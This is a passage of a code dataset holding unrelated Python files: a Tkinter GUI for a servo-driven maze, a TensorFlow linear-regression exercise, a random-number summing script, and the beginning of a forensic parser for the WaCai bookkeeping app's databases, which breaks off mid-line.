dict_to_save.items():\n out.write(str(k) + ' ' + str(v) + '\\n')\n\n # Load and plot loaded data\n def load_b(self):\n self.clear_maze()\n\n # Get files in maze folder and get maze name\n load_folder = filedialog.askdirectory()\n onlyfiles = [f for f in listdir(load_folder) if isfile(join(load_folder, f))]\n mazename = onlyfiles[0].split('_')[0]\n self.mazename.set(mazename)\n\n # For each file load the info and save into correct variables\n for f in onlyfiles:\n filename = '{}/{}'.format(load_folder, f)\n if f[-3:] == 'npy':\n # load into array which servos are assigned to which bridges\n self.servos_bridges = np.load(filename)\n\n elif f[-3:] == 'txt':\n # Load canvas items coordinates and labels into dictionary\n plotting_data = {}\n with open(filename) as textfile:\n for line in textfile:\n if len(line)>4:\n splits = line.split(' ', 1)\n key = splits[0]\n temp = splits[1][1:-2]\n temp2 = temp.split('],')\n\n vlist = []\n for t in temp2:\n d1 = re.search(\"\\d\", t)\n firstd = d1.start()\n d2 = re.search(r'(\\d)[^\\d]*$', t)\n lastd = d2.start() + 1\n\n vals = t[firstd:lastd].split(', ')\n tempvals = [float(x) for x in vals]\n vlist.append(tempvals)\n\n plotting_data[key] = vlist\n\n # Okay now plot stuff on canvas\n self.plot_loaded(plotting_data)\n\n # Now close all bridges\n self.close_all()\n\n # Enable session start btn\n self.sesscontrolbtn['state'] = NORMAL\n self.sesscontrolbtn['bg'] = 'green2'\n\n \"\"\" Serial Communication \"\"\"\n # Check serial status\n def checkser(self):\n \"\"\"\n Starts serial communication\n :return: success or fail to start communication\n \"\"\"\n if self.comname.get() != \"COM number\":\n try:\n self.ser = setup_ser(self.comname.get())\n self.ser_status_lbl.config(text='Serial started on port {}'.format(self.comname.get()))\n return True\n except:\n # print('Failed to start serial')\n return True\n else:\n print('please select COM first')\n self.getcoms()\n return False\n\n # Get list of available comms\n def getcoms(self):\n coms = serial_ports()\n print(coms)\n self.ser_status_lbl['text'] = 'Available COMs: {}'.format(coms)\n\n \"\"\" Maze and Session Control \"\"\"\n # Close all bridges\n def close_all(self):\n # If we have serial communication issue a command to servos to close all bridges, update canvas\n commcheck = self.checkser()\n if commcheck:\n # Change color of bridges on canvas, move stuff between lists widgets\n for i, listbox_entry in enumerate(self.assigned_bridgeslist.get(0, END)):\n if listbox_entry != 'No assigned briges...':\n self.avail_bridgeslist.insert(END, listbox_entry)\n self.assigned_bridgeslist.delete(0)\n\n all_oncanv = self.c.find_all()\n for oncanv in all_oncanv:\n if self.c.gettags(oncanv):\n if self.c.gettags(oncanv)[0][0:6] == 'Bridge':\n self.c.itemconfig(oncanv, fill=\"firebrick3\")\n self.c.update()\n\n # Move servos\n self.ser.flushInput() # flush input buffer, discarding all its contents\n self.ser.flushOutput() # flush output buffer, aborting current output\n nservos = np.max(self.servos_bridges)\n for snum in range(np.int(nservos)):\n self.ser.write(str(snum+1).encode())\n time.sleep(.08)\n self.ser.write('c'.encode())\n time.sleep(.04)\n\n if self.is_session_running:\n # Update log file\n num_br = self.servos_bridges.shape[0]\n bridges_status = []\n for brnum in range(num_br):\n bridges_status.append(0)\n self.sessionfile.write('Close all at: ' + time.asctime()[10:20] + '\\n')\n for br in bridges_status:\n self.sessionfile.write(str(br))\n self.sessionfile.write(', ')\n self.sessionfile.write('\\n\\n\\n')\n\n # Execute pre-selected command [or wait for input from LabView program]\n def exec_command(self):\n \"\"\"\n When the user has assigned bridges to open [the command] this function controls the execution of this command.\n If the option to manually control the bridge is ON it simply executes the command, otherwise it\n waits for a TTL pulse [which is picked up by openCM and transmitted to python through serial]\n \"\"\"\n commcheck = self.checkser()\n if commcheck:\n if not self.is_session_running:\n print('Please start recording session first')\n return\n\n # move stuff between lists widgets\n bridges_tomove_id, bridges_tomove_labels = [], []\n for i, listbox_entry in enumerate(self.assigned_bridgeslist.get(0, END)):\n if listbox_entry != 'No assigned briges...':\n bridges_tomove_id.append(int(listbox_entry[-1]))\n bridges_tomove_labels.append(listbox_entry)\n\n # If we are not controlling the maze manually, wait for ttl pulse\n if not self.manualcontrol__var.get():\n self.executebtn['bg'] = 'ivory2'\n self.executebtn['text'] = 'Waiting for input'\n self.ser.flushInput()\n self.ser.flushOutput()\n cmd = ''\n cmd_received = False\n while not cmd_received:\n cmd = self.ser.read()\n if cmd.decode() == 't':\n cmd_received = True\n self.executebtn['bg'] = 'khaki2'\n self.executebtn['text'] = 'Execute Command'\n\n self.ser.flushInput()\n self.ser.flushOutput()\n servos_tomove_l = []\n for id in bridges_tomove_id:\n correctid = id-1\n servos_tomove_l.append(self.servos_bridges[correctid,:].tolist())\n servos_tomove_l = [item for sublist in servos_tomove_l for item in sublist]\n servos_tomove_l = [int(x) for x in servos_tomove_l]\n\n for servid in servos_tomove_l:\n self.ser.write(str(servid).encode())\n time.sleep(.08)\n self.ser.write('o'.encode())\n time.sleep(.04)\n\n # Change color of bridges on canvas\n all_oncanv = self.c.find_all()\n for idx, oncanv in enumerate(all_oncanv):\n if self.c.gettags(oncanv):\n if self.c.gettags(oncanv)[0][0:6] == 'Bridge':\n if int(self.c.gettags(oncanv)[0][-1]) in bridges_tomove_id:\n self.c.itemconfig(oncanv, fill=\"green\")\n self.c.update()\n\n # Update log file\n num_br = self.servos_bridges.shape[0]\n bridges_status = []\n for brnum in range(num_br):\n if brnum+1 in bridges_tomove_id:\n bridges_status.append(1)\n else:\n bridges_status.append(0)\n self.sessionfile.write('Exec. command at: ' + time.asctime()[10:20] + '\\n')\n for br in bridges_status:\n self.sessionfile.write(str(br))\n self.sessionfile.write(', ')\n self.sessionfile.write('\\n\\n\\n')\n\n # Control start/end of session + data storage\n def sessioncontrol(self):\n \"\"\"\n Starts/stop session recording. It requires the user to give the session a name and to\n provide a path to where to store the session data, then it creates and open/closes the relative file\n \"\"\"\n\n if not self.is_session_running:\n # Start session recording\n session_name = self.sess_savename.get()\n mazename = self.mazename.get()\n\n # Check that the session and the maze have a name\n if session_name == \"Enter session name...\":\n print('Please give a name for the session first')\n return\n\n if mazename == 'Enter maze name... [Decisi-o-nator_3000]':\n print('Please give a name to your maze')\n return\n\n # Everything is okay so we can start the session\n self.is_session_running = True\n\n # Request folder in which to save text file, open file write session details\n save_folder = filedialog.askdirectory()\n session_save_name = '{}/{}_{}_sessdata.txt'.format(save_folder, session_name, mazename)\n\n self.sessionfile = open(session_save_name, 'w')\n self.sessionfile.write('Started: ' + time.asctime() + '\\n\\n')\n self.sessionfile.write('Session: ' + session_name + '\\n\\n')\n self.sessionfile.write('Maze: ' + mazename + '\\n\\n')\n\n # Also save maze conformation as numpy: ROW=bridges statuses, COL=change num\n self.mazeconformationrecord = np.empty((0, 0))\n\n # Save canvas as an image\n canvas_name = '{}/{}_{}_canvas'.format(save_folder, session_name, mazename)\n self.c.postscript(file=canvas_name, colormode='color')\n\n # Change the buttons look\n self.sesscontrolbtn['bg'] = 'OrangeRed2'\n self.sesscontrolbtn['text'] = 'Stop session'\n else:\n # Stop session recording: log time\n self.sessionfile.write('Terminated: ' + time.asctime())\n\n # Change button appearance and diable\n self.sesscontrolbtn['bg'] = 'ivory2'\n self.sesscontrolbtn['text'] = 'session stopped'\n self.sesscontrolbtn['state'] = DISABLED\n\n # Close file\n self.sessionfile.close()\n\n \"\"\" Toggle functions \"\"\"\n # Toggle buttons functions [they call each other]\n def toggle_shelter(self):\n if self.shelterbtn.config('relief')[-1] == 'sunken':\n self.shelterbtn.config(relief=\"raised\")\n self.placingsheleter = False\n else:\n self.shelterbtn.config(relief=\"sunken\")\n if self.assigningservos:\n self.toggle_servos()\n if self.assigningbridges:\n self.toggle_bridges()\n self.placingsheleter = True\n\n def toggle_bridges(self):\n if self.bridgesbtn.config('relief')[-1] == 'sunken':\n self.bridgesbtn.config(relief=\"raised\")\n self.assigningbridges = False\n else:\n self.bridgesbtn.config(relief=\"sunken\")\n self.assigningbridges = True\n self.bridgeslist.select_set(0)\n\n if self.assigningservos:\n self.toggle_servos()\n if self.placingsheleter:\n self.toggle_shelter()\n\n def toggle_servos(self):\n if self.servosbtn.config('relief')[-1] == 'sunken':\n self.servosbtn.config(relief=\"raised\")\n self.assigningservos = False\n else:\n self.servosbtn.config(relief=\"sunken\")\n self.assigningservos = True\n self.servoslist.select_set(0)\n\n if self.assigningbridges:\n self.toggle_bridges()\n if self.placingsheleter:\n self.toggle_shelter()\n\n # Control behaviour of drawing check button\n def drawingcheck(self):\n if self.drawingcheckbtn_var.get():\n self.drawingcheck_var = False\n if self.drawing_br_checkbtn_var.get():\n self.drawing_br_checkbutton.invoke()\n else:\n self.drawingcheck_var = True\n\n def drawing_br_check(self):\n if self.drawing_br_checkbtn_var.get():\n self.drawingcheck_var = True\n # Delete all guidelines\n self.deletefromcanvas_nontag('guideline', False)\n self.nextbrbtnt['state'] = ACTIVE\n else:\n self.drawingcheckbutton.invoke()\n self.nextbrbtnt['state'] = DISABLED\n\n\n \"\"\"\n =================================================================================================\n =================================================================================================\n Design\n =================================================================================================\n =================================================================================================\n \"\"\"\n\n def __init__(self):\n # Flags\n self.drawingcheck_var = True\n self.placingsheleter = False\n self.assigningbridges = False\n self.assigningservos = False\n\n self.is_session_running = False # Used to check if session is running and control data acquisition\n\n # Initialise variables to store data\n self.servos_bridges_d = {} # Here we store the two servos ID linked with each bridge\n self.platfs_coords, self.bridges_coords = [], []\n self.platfs_l, self.bridges_l = [], []\n self.manualbr_coords = []\n self.bridges_count = 0\n\n # Create window of set size and at a set location\n self.root = tk.Tk()\n w, h, x, y = 1300, 830, 10, 50\n self.root.geometry('%dx%d+%d+%d' % (w, h, x, y))\n self.root.grid_columnconfigure(1, weight=1)\n self.root.configure(background='gray14')\n\n \"\"\"\n =================================================================================================\n GUI LAYOUT\n =================================================================================================\n \"\"\"\n\n \"\"\"\n =================================================================================================\n Canvas\n \"\"\"\n # Create canvas\n self.c = Canvas(self.root, width=800, height=800,\n background=\"lavender blush\", confine=True,\n relief='sunken')\n self.c.grid(row=0, column=0, sticky=\"w\", padx=(10,0))\n\n # Big frame right of canvas [ Contains sub frames]\n self.bigf = Frame(self.root)\n self.bigf.grid(row=0, column=1, sticky=\"nsew\", columnspan=4, pady=5, padx=10)\n self.bigf.grid_columnconfigure(0, weight=1)\n\n \"\"\"\n =================================================================================================\n Editor\n \"\"\"\n # Frame and session name frame\n self.name_f = Frame(self.bigf, relief=\"ridge\", bg=\"alice blue\", borderwidth=2, width=405)\n self.name_f.grid(row=0, sticky=\"nwe\")\n self.name_f.grid_columnconfigure(1, weight=1)\n\n self.fname_lbl = Label(self.name_f, text=\"Maze name\", bg=\"alice blue\", font=(\"bold\", 10))\n self.fname_lbl.grid(row=0, column=0, padx=5, pady=2, sticky=\"nsew\")\n\n self.mazename = StringVar()\n self.fname_entry = Entry(self.name_f, textvariable=self.mazename)\n self.fname_entry.grid(row=0, column=1, padx=5, pady=2, sticky=\"we\")\n self.mazename.set(\"Enter maze name... [Decisi-o-nator_3000]\")\n\n self.sesname_lbl = Label(self.name_f, text=\"Session name\", bg=\"alice blue\", font=(\"bold\", 12))\n self.sesname_lbl.grid(row=1, column=0, padx=5, pady=2, sticky=\"nsew\")\n\n self.sess_savename = StringVar()\n self.fname_entry = Entry(self.name_f, textvariable=self.sess_savename)\n self.fname_entry.grid(row=1, column=1, padx=5, pady=2, sticky=\"we\")\n self.sess_savename.set(\"Enter session name...\")\n\n # MENU frame within big frame\n self.menu_f = Frame(self.bigf, bg=\"LightCyan2\", relief=\"groove\", borderwidth=2)\n self.menu_f.grid(row=1, column=0, sticky=\"w\")\n\n self.drawing_br_checkbtn_var = IntVar() # <-- work in progress: manually draw bridges\n self.drawing_br_checkbutton = Checkbutton(self.menu_f, text=\"Draw bridge\",\n variable=self.drawing_br_checkbtn_var,\n command=self.drawing_br_check, bg='LightCyan2')\n self.drawing_br_checkbutton.grid(row=0, column=1, padx=5, pady=5)\n\n self.drawingcheckbtn_var = IntVar()\n self.drawingcheckbutton = Checkbutton(self.menu_f, text=\"Not drawing\", variable=self.drawingcheckbtn_var,\n command=self.drawingcheck, bg='LightCyan2')\n self.drawingcheckbutton.invoke()\n self.drawingcheckbutton.grid(row=0, column=0, padx=5, pady=5)\n\n self.nextbrbtnt = Button(self.menu_f, text=\"Next BR\", bg='LightCyan3', command=self.nextbr_b, state=DISABLED)\n self.nextbrbtnt.grid(row=0, column=2, padx=5, pady=5)\n\n self.dispbtnt = Button(self.menu_f, text=\"Draw maze\", bg='LightCyan3', command=self.draw_maze)\n self.dispbtnt.grid(row=1, column=0, padx=5, pady=5)\n\n self.clearbtn = Button(self.menu_f, text=\"Clear maze\", bg='LightCyan3', command=self.clear_maze)\n self.clearbtn.grid(row=1, column=1, padx=5, pady=5)\n\n self.shelterbtn = Button(self.menu_f, text=\"Place shelter\", bg='LightCyan3', command=self.toggle_shelter, relief=\"raised\")\n self.shelterbtn.grid(row=1, column=2, padx=5, pady=5)\n\n # LOAD FRAME\n self.load_f = Frame(self.bigf, bg=\"linen\", relief=\"groove\", borderwidth=2)\n self.load_f.grid(row=1, column=0, sticky=\"nse\")\n\n self.load_lbl = Label(self.load_f, text=\"Load/Save\", bg=\"linen\", font=(\"bold\", 10))\n self.load_lbl.pack(anchor=\"w\", padx=5, pady=5)\n\n self.loadbtn = Button(self.load_f, text=\"Load maze\", bg=\"LavenderBlush2\", command=self.load_b)\n self.loadbtn.pack(side=LEFT, anchor=\"w\", padx=5, pady=5)\n\n self.savebnt = Button(self.load_f, text=\"Save maze\", bg=\"LavenderBlush2\", command=self.save_b)\n self.savebnt.pack(side=LEFT, anchor=\"w\", padx=5, pady=5)\n\n # lists subframe\n self.lists_f = Frame(self.bigf, bg=\"alice blue\", relief=\"groove\", borderwidth=2)\n self.lists_f.grid(row=2, column=0, sticky=\"we\")\n\n self.assignment_lbl = Label(self.lists_f, bg=\"alice blue\", text=\"Assign components\", font=(\"bold\", 12))\n self.assignment_lbl.grid(column=0, row=0, sticky='wn', pady=(10,0), padx=5)\n\n self.readybtn = Button(self.lists_f, text=\"Ready\", relief=\"raised\", bg=\"DarkOliveGreen3\",\n command=self.design_ready)\n self.readybtn.grid(row=0, column=1, sticky='en', padx=5, pady=(10,0))\n\n # BRIDGES\n self.bridges_f = Frame(self.lists_f, bg=\"linen\", relief=\"ridge\", borderwidth=2)\n self.bridges_f.grid(column=0, row=1, sticky='wn', padx=25, pady=(10, 5))\n self.bridges_f.grid_columnconfigure(0, weight=1)\n\n self.bridgesbtn = Button(self.bridges_f, text=\"Assign bridges\", relief=\"raised\", bg=\"alice blue\",\n command=self.toggle_bridges)\n self.bridgesbtn.grid(row=0, column=0, sticky='wn', padx=5, pady=5)\n\n self.bridgeslist = Listbox(self.bridges_f)\n self.bridgeslist.insert(END, \"No unassigned bridges...\")\n self.bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n if platform.system() == 'Windows':\n self.bridgeslist.bind('', self.edit_list_entry)\n else:\n self.bridgeslist.bind('', self.edit_list_entry)\n\n\n # SERVOS\n self.servos_f = Frame(self.lists_f, bg=\"linen\", relief=\"ridge\", borderwidth=2)\n self.servos_f.grid(column=1, row=1, sticky='nw', padx=25, pady=(10, 5))\n\n self.servosbtn = Button(self.servos_f, text=\"Assign servos\", relief=\"raised\", bg=\"alice blue\",\n command=self.toggle_servos)\n self.servosbtn.grid(row=0, column=0, sticky='wn', padx=5, pady=5)\n\n self.servoslist = Listbox(self.servos_f)\n self.servoslist.insert(END, \"No unassigned servos...\")\n self.servoslist.grid(row=2, sticky='we', pady=5, padx=5)\n if platform.system() == 'Windows':\n self.servoslist.bind('', self.edit_list_entry)\n else:\n self.servoslist.bind('', self.edit_list_entry)\n\n\n \"\"\"\n =================================================================================================\n Control\n \"\"\"\n self.editor_f = Frame(self.bigf, bg=\"OliveDrab4\", relief=\"groove\", borderwidth=2)\n self.editor_f.grid(row=3, column=0, sticky=\"we\")\n\n self.assignment_lbl = Label(self.editor_f, text=\"Maze Control\", bg=\"OliveDrab4\", font=(\"bold\", 14))\n self.assignment_lbl.grid(column=0, row=0, sticky='wn', pady=5, padx=5)\n\n self.closebtn = Button(self.editor_f, text=\"Close all\", bg='burlywood2', command=self.close_all)\n self.closebtn.grid(column=0, row=1, sticky='n', pady=5, padx=0)\n\n self.executebtn = Button(self.editor_f, text=\"Execute cmnd\", bg='khaki2', command=self.exec_command)\n self.executebtn.grid(column=1, row=1, sticky='wn', pady=5, padx=5)\n\n self.sesscontrolbtn = Button(self.editor_f, text=\"Start session\", bg='burlywood2', command=self.sessioncontrol,\n state=DISABLED)\n self.sesscontrolbtn.grid(column=2, row=1, sticky='n', pady=5, padx=0)\n\n self.manualcontrol__var = IntVar()\n self.manualcontrolbtn = Checkbutton(self.editor_f, text=\"Manual control\", variable=self.manualcontrol__var,\n bg='OliveDrab4')\n self.manualcontrolbtn.grid(row=0, column=1, padx=5, pady=5)\n\n # Available BRIDGES\n self.available_bridges = Frame(self.editor_f, bg=\"DarkOliveGreen3\", relief=\"ridge\", borderwidth=2)\n self.available_bridges.grid(column=0, row=2, columnspan=2, sticky='wn', padx=25, pady=(15, 10))\n self.available_bridges.grid_columnconfigure(0, weight=1)\n\n self.bridges_lbl = Label(self.available_bridges, text=\"Bridges to assign\", bg=\"DarkOliveGreen3\")\n self.bridges_lbl.grid(column=0, row=1, sticky='wn')\n\n self.avail_bridgeslist = Listbox(self.available_bridges)\n self.avail_bridgeslist.insert(END, \"No unassigned bridges...\")\n self.avail_bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n self.avail_bridgeslist.bind('', self.assign_br)\n\n # Assigned BRIDGES\n self.assigned_bridges_f = Frame(self.editor_f, bg=\"DarkOliveGreen3\", relief=\"ridge\", borderwidth=2)\n self.assigned_bridges_f.grid(column=2, row=2, columnspan=2, sticky='nw', padx=25, pady=(15, 10))\n\n self.servos_lbl = Label(self.assigned_bridges_f, text=\"Assigned bridges\", bg='DarkOliveGreen3')\n self.servos_lbl.grid(column=0, row=1, sticky='wn')\n\n self.assigned_bridgeslist = Listbox(self.assigned_bridges_f)\n self.assigned_bridgeslist.insert(END, \"No assigned briges...\")\n self.assigned_bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n self.assigned_bridgeslist.bind('', self.remove_assigned_br)\n\n # SERIAL\n self.ser_f = Frame(self.bigf, bg='MistyRose3', relief=\"groove\", borderwidth=2)\n self.ser_f.grid(row=4, column=0, sticky=\"we\")\n\n self.getcomsbtn = Button(self.ser_f, text=\"Get COMs\", command=self.getcoms, bg='LightYellow2')\n self.getcomsbtn.grid(column=0, row=1, sticky='wn', pady=5, padx=5)\n\n self.startserbtb = Button(self.ser_f, text=\"Start serial\", command=self.checkser, bg='LightYellow2')\n self.startserbtb.grid(column=0, row=2, sticky='wn', pady=5, padx=5)\n\n self.ser_status_lbl = Label(self.ser_f, text=\"Serial unavailable\", bg='MistyRose3')\n self.ser_status_lbl.grid(column=1, row=1, sticky='wn', pady=6, padx=5)\n\n self.comname = StringVar()\n self.comname_e = Entry(self.ser_f, textvariable=self.comname)\n self.comname_e.grid(row=2, column=1, columnspan=1, padx=5, pady=5, sticky=\"we\")\n self.comname.set(\"COM number\")\n\n \"\"\"\n =================================================================================================\n Functionality\n =================================================================================================\n \"\"\"\n\n # MOUSE CLICK events\n # If we are drowing the maze get click coords and draw a circle\n self.c.bind(\"\", self.canvas_editing_interactions)\n # Right click delets the selected element\n if platform.system() == 'Windows':\n self.c.bind(\"\", self.del_obj)\n else:\n self.c.bind(\"\", self.del_obj)\n\n\n\nif __name__ == '__main__':\n root = GUI()\n # Start loop\n tk.mainloop()\n","sub_path":"xl320_control/xl_320_control_python/dec_maze_gui.py","file_name":"dec_maze_gui.py","file_ext":"py","file_size_in_byte":46226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"600165936","text":"import math\n\nfrom IPython import display\nfrom matplotlib import cm\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\n\nfrom utils import *\n\ntf.logging.set_verbosity(tf.logging.ERROR)\npd.options.display.max_rows = 10\npd.options.display.float_format = '{:.1f}'.format\n\ndef train_model(data, learning_rate, steps, batch_size, features=\"total_rooms\", targets=\"median_house_value\"):\n periods = 10\n steps_per_period = steps / periods\n \n # Set up to plot the state of our model's line each period.\n plt.figure(figsize=(15, 6))\n plt.subplot(1, 2, 1)\n plt.title(\"Learned Line by Period\")\n plt.ylabel(targets)\n plt.xlabel(features)\n sample = data.sample(n=300)\n plt.scatter(sample[features], sample[targets])\n colors = [cm.coolwarm(x) for x in np.linspace(-1, 1, periods)]\n \n ###############################################################################\n # retrieve data\n X, Y = load_data(data, features=features, targets=targets)\n\n # Create feature columns.\n feature_columns = [tf.feature_column.numeric_column(key=features)]\n \n # Create input functions.\n training_input_fn = lambda: my_input_fn(X, Y, batch_size=batch_size)\n prediction_input_fn = lambda: my_input_fn(X, Y, num_epochs=1, shuffle=False)\n \n ## Build model\n # Create a linear regressor object.\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\n linear_regressor = tf.estimator.LinearRegressor(\n feature_columns=feature_columns,\n optimizer=my_optimizer\n )\n\n ###############################################################################\n ## Train the model, but do so inside a loop so that we can periodically assess\n # loss metrics.\n print(\"Training model...\")\n print(\"RMSE (on training data):\")\n root_mean_squared_errors = []\n \n for period in range (0, periods):\n # Train the model, starting from the prior state.\n linear_regressor.train(\n input_fn=training_input_fn,\n steps=steps_per_period\n )\n\n # Take a break and compute predictions.\n predictions = linear_regressor.predict(input_fn=prediction_input_fn)\n predictions = np.array([item['predictions'][0] for item in predictions])\n \n # Compute loss.\n root_mean_squared_error = math.sqrt(\n metrics.mean_squared_error(predictions, Y))\n \n # Occasionally print the current loss.\n print(\"period {:2d} : {:.2f}\".format(period, root_mean_squared_error))\n \n \n # Add the loss metrics from this period to our list.\n root_mean_squared_errors.append(root_mean_squared_error)\n\n # Finally, track the weights and biases over time.\n # Apply some math to ensure that the data and line are plotted neatly.\n y_extents = np.array([0, sample[targets].max()])\n\n weight = linear_regressor.get_variable_value('linear/linear_model/{}/weights'.format(features))[0]\n bias = linear_regressor.get_variable_value('linear/linear_model/bias_weights')\n\n x_extents = (y_extents - bias) / weight\n # np.minimum(X, Y), np.maxmun(X, Y): 會逐位比較(broadcasting)\n x_extents = np.maximum(np.minimum(x_extents, sample[features].max()), sample[features].min())\n \n y_extents = weight * x_extents + bias\n plt.plot(x_extents, y_extents, color=colors[period]) \n \n print(\"Model training finished.\")\n\n # Output a graph of loss metrics over periods.\n plt.subplot(1, 2, 2)\n plt.ylabel('RMSE')\n plt.xlabel('Periods')\n plt.title(\"Root Mean Squared Error vs. Periods\")\n plt.tight_layout()\n plt.plot(root_mean_squared_errors)\n\n # Output a table with calibration data.\n calibration_data = pd.DataFrame()\n calibration_data[\"predictions\"] = pd.Series(predictions)\n calibration_data[\"targets\"] = pd.Series(Y)\n #display.display(calibration_data.describe())\n print(calibration_data.describe())\n\n print(\"Final RMSE (on training data): {:.2f}\".format(root_mean_squared_error))\n \n\nif __name__ == '__main__':\n # Read CSV file\n california_housing_df = pd.read_csv(\"../data/california_housing_train.csv\", sep=\",\")\n \n # randomize the data and scale median_house_value to be in units of thousands\n california_housing_df = df_processing(california_housing_df)\n\n # Train model\n features=\"total_rooms\"\n targets=\"median_house_value\"\n \n train_model(\n data=california_housing_df,\n learning_rate=0.001,\n steps=10,\n batch_size=1,\n features=features,\n targets=targets\n )\n\n plt.show()\n\n ","sub_path":"First Steps with TF/fisrt_steps_with_tensorflow_2.py","file_name":"fisrt_steps_with_tensorflow_2.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"578628673","text":"import random\r\nimport pprint\r\nn=0\r\neven = []\r\nodd = []\r\nwhile n < 100:\r\n f = random.randint(1,100)\r\n if f % 2 == 0:\r\n even.append(f)\r\n else:\r\n odd.append(f)\r\n n += 1\r\nsum_even = [sum(even)]\r\nsum_odd = [sum(odd)]\r\nprint(sum_odd) #проверка логики\r\ntotal = {}\r\nt = 1\r\nfor variable in even, odd, sum_even, sum_odd:\r\n total[t]=variable\r\n t+=1\r\npprint.pprint(total, width=1)\r\n","sub_path":"Dic.py","file_name":"Dic.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"181971921","text":"#coding:utf-8\n\n__author__ = \"Xu Tao\"\n\nimport clr\ntry:\n clr.AddReference(\"model_wacai\")\n clr.AddReference(\"MapUtil\")\nexcept:\n pass\n\nfrom PA_runtime import *\n\nimport json\nimport model_wacai\nfrom MapUtil import md5\n\nVERSION_APP_VALUE = 2\n\n\nclass WaCaiTally(object):\n\n def __init__(self, node, extract_deleted, extract_source):\n self.root = node.Parent.Parent.Parent\n self.extract_deleted = extract_deleted\n self.extract_source = extract_source\n self.wacai = model_wacai.WACAI()\n self.cache = ds.OpenCachePath(\"挖财记账\")\n\n def parse(self):\n if self.root is None:\n return\n db_path = md5(self.cache, self.root.AbsolutePath)\n if self.wacai.need_parse(db_path, VERSION_APP_VALUE):\n self.wacai.db_create(db_path)\n group_node = self.root.GetByPath(\"/Documents/GroupTallySDK\")\n self.get_group_tally(group_node)\n family_node = self.root.GetByPath(\"/Documents/FamilyTallySDK\")\n self.get_family_data(family_node)\n\n if not canceller.IsCancellationRequested:\n self.wacai.db_insert_table_version(model_wacai.VERSION_KEY_DB, model_wacai.VERSION_VALUE_DB)\n self.wacai.db_insert_table_version(model_wacai.VERSION_KEY_APP, VERSION_APP_VALUE)\n \n if self.wacai.db is not None:\n self.wacai.db_commit()\n self.wacai.db_close()\n \n models = model_wacai.ExportModel(db_path).get_model()\n return models\n\n def get_group_tally(self, node):\n if node is None:\n return\n self.get_grounp_tally_books(node)\n self.get_group_member(node)\n self.get_group_bill(node)\n\n def get_family_data(self, node):\n self.get_family_tally(node)\n self.get_family_member(node)\n self.get_family_bill(node)\n self.get_family_monthly_bill(node)\n\n def get_grounp_tally_books(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return \n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n tid = self._get_table_record_value(rec, \"id\") # int\n tname = self._get_table_record_value(rec, \"name\")\n ttype = self._get_table_record_value(rec, \"type\")\n data = self._get_table_record_value(rec, \"data\")\n\n tally_book = model_wacai.Tally()\n tally_book.source = db_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n tally_book.deleted = 1\n tally_book.bookId = str(tid)\n tally_book.name = tname\n tally_book.tallyType = 2\n if data:\n try:\n tally_data = json.loads(data)\n if \"currencyFlag\" in tally_data:\n tally_book.moneyFlag = tally_data[\"currencyFlag\"]\n if \"memberCount\" in tally_data:\n tally_book.memberCount = tally_data[\"memberCount\"]\n if \"createdTime\" in tally_data:\n tally_book.createTime = tally_data[\"createdTime\"]\n if \"updatedTime\" in tally_data:\n tally_book.updatedTime = tally_data[\"updatedTime\"]\n except:\n pass\n if tally_book.bookId:\n self.wacai.db_insert_table_tally(tally_book)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n \n def get_group_member(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return\n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP_MEMBER\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP_MEMBER\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n bookid = self._get_table_record_value(rec, \"bookid\")\n mid = self._get_table_record_value(rec, \"mid\")\n name = self._get_table_record_value(rec, \"name\")\n avatar = self._get_table_record_value(rec, \"avatar\")\n\n member = model_wacai.Member()\n member.source = db_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n member.deleted = 1\n member.bookId = str(bookid)\n member.memberId = str(mid)\n member.avatar = avatar\n member.name = name\n if member.bookId and member.memberId:\n self.wacai.db_insert_table_member(member)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n \n def get_group_bill(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return\n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP_BILL\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP_BILL\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n bill_record = model_wacai.BillRecord()\n bill_record.source = db_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n bill_record.deleted = 1\n tid = self._get_table_record_value(rec, \"bookid\") # int\n bill_record.bookId = str(tid)\n ttype = self._get_table_record_value(rec, \"type\")\n create_time = self._get_table_record_value(rec, \"billtime\")\n bill_record.createTime = create_time\n rec_data = self._get_table_record_value(rec, \"data\")\n if rec_data:\n try:\n bill_data = json.loads(rec_data)\n if \"data\" in bill_data:\n data = bill_data[\"data\"]\n if \"subcategoryName\" in data:\n name = data[\"subcategoryName\"]\n bill_record.name = name\n if \"amount\" in data:\n amount = data[\"amount\"]\n if amount:\n bill_record.amount = float(amount) / 100\n if 